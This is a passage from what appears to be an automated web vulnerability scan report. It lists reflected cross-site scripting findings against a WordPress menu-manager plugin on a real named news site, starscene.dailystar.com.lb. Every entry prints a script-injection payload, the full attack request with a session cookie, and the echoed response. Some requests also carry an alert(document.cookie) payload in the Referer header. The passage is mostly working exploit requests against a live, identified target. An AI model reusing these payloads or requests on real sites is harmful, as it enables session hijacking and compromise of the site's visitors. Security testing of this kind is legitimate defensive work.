X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:47 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js4cc57\"><script>alert(1)</script>10a34925f56/menu-manager.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.237. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/menu-manager.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adb47"><script>alert(1)</script>27ad8d8ecc8 was submitted in the REST URL parameter 6. This input was echoed as adb47\"><script>alert(1)</script>27ad8d8ecc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js/menu-manager.jsadb47"><script>alert(1)</script>27ad8d8ecc8?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js/menu-manager.jsadb47\"><script>alert(1)</script>27ad8d8ecc8?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.238. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33252"><script>alert(1)</script>892296e34a1 was submitted in the REST URL parameter 1. This input was echoed as 33252\"><script>alert(1)</script>892296e34a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content33252"><script>alert(1)</script>892296e34a1/plugins/menu-manager/display/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:10:00 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:10:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content33252\"><script>alert(1)</script>892296e34a1/plugins/menu-manager/display/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.239. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e92b"><script>alert(1)</script>c701359bfce was submitted in the REST URL parameter 2. This input was echoed as 8e92b\"><script>alert(1)</script>c701359bfce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins8e92b"><script>alert(1)</script>c701359bfce/menu-manager/display/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins8e92b\"><script>alert(1)</script>c701359bfce/menu-manager/display/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.240. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a836"><script>alert(1)</script>b66ed940538 was submitted in the REST URL parameter 3. This input was echoed as 1a836\"><script>alert(1)</script>b66ed940538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager1a836"><script>alert(1)</script>b66ed940538/display/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:30 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager1a836\"><script>alert(1)</script>b66ed940538/display/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.241. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e92b"><script>alert(1)</script>c8a30cb0fa was submitted in the REST URL parameter 4. This input was echoed as 6e92b\"><script>alert(1)</script>c8a30cb0fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display6e92b"><script>alert(1)</script>c8a30cb0fa/js/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display6e92b\"><script>alert(1)</script>c8a30cb0fa/js/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.242. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305f5"><script>alert(1)</script>4362317aaa9 was submitted in the REST URL parameter 5. This input was echoed as 305f5\"><script>alert(1)</script>4362317aaa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js305f5"><script>alert(1)</script>4362317aaa9/superfish.js?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js305f5\"><script>alert(1)</script>4362317aaa9/superfish.js?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.243. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/js/superfish.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83911"><script>alert(1)</script>6a3ac9adfda was submitted in the REST URL parameter 6. This input was echoed as 83911\"><script>alert(1)</script>6a3ac9adfda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/js/superfish.js83911"><script>alert(1)</script>6a3ac9adfda?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/js/superfish.js83911\"><script>alert(1)</script>6a3ac9adfda?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.244. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ce8"><script>alert(1)</script>ba74cc712aa was submitted in the REST URL parameter 1. This input was echoed as 16ce8\"><script>alert(1)</script>ba74cc712aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content16ce8"><script>alert(1)</script>ba74cc712aa/plugins/menu-manager/display/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content16ce8\"><script>alert(1)</script>ba74cc712aa/plugins/menu-manager/display/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.245. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73cf6"><script>alert(1)</script>00ef22bfef2 was submitted in the REST URL parameter 2. This input was echoed as 73cf6\"><script>alert(1)</script>00ef22bfef2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins73cf6"><script>alert(1)</script>00ef22bfef2/menu-manager/display/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:09:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:09:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:09:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins73cf6\"><script>alert(1)</script>00ef22bfef2/menu-manager/display/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.246. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54cc"><script>alert(1)</script>3dcd13916d8 was submitted in the REST URL parameter 3. This input was echoed as d54cc\"><script>alert(1)</script>3dcd13916d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-managerd54cc"><script>alert(1)</script>3dcd13916d8/display/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:11:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:11:07 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:11:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-managerd54cc\"><script>alert(1)</script>3dcd13916d8/display/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.247. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a0d"><script>alert(1)</script>7d151f57cba was submitted in the REST URL parameter 4. This input was echoed as 17a0d\"><script>alert(1)</script>7d151f57cba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display17a0d"><script>alert(1)</script>7d151f57cba/styles/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:03 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
